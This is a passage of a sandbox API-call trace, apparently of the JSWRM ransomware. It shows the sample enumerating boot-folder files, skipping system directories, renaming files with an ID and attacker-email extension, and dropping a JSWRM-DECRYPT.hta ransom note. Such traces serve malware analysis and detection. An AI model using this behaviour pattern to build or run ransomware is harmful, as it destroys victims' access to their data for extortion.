[0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0064.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0064.231] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.232] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9787749433523976) returned 0 [0064.232] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.233] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.233] CloseHandle (hObject=0xffffffff) returned 1 [0064.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0064.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.234] MoveFileW (lpExistingFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0064.234] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf23e2f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf23e2f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf23e2f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.234] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.235] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.235] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0064.235] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.235] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9782458033815216) returned 0 [0064.236] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.236] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.236] CloseHandle (hObject=0xffffffff) returned 1 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0064.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0064.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0064.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.236] MoveFileW (lpExistingFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0064.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0064.236] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.236] FindClose (in: hFindFile=0x232200 | out: hFindFile=0x232200) returned 1 [0064.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.237] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2=".") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="..") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="...") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="windows") returned -1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="recovery") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="perflogs") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="documents and settings") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="$RECYCLE.BIN") returned 1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="system volume information") returned -1 [0064.237] lstrcmpiW (lpString1="Resources", lpString2="msocache") returned 1 [0064.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.237] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\resources\\jswrm-decrypt.hta")) returned 0xffffffff [0064.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0064.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.238] CreateFileW (lpFileName="C:\\Boot\\Resources\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\resources\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.238] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.238] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.239] CloseHandle (hObject=0x450) returned 1 [0064.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0064.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.241] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\resources\\jswrm-decrypt.hta")) returned 0x20 [0064.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.242] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cf23e2f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0064.242] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.242] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, 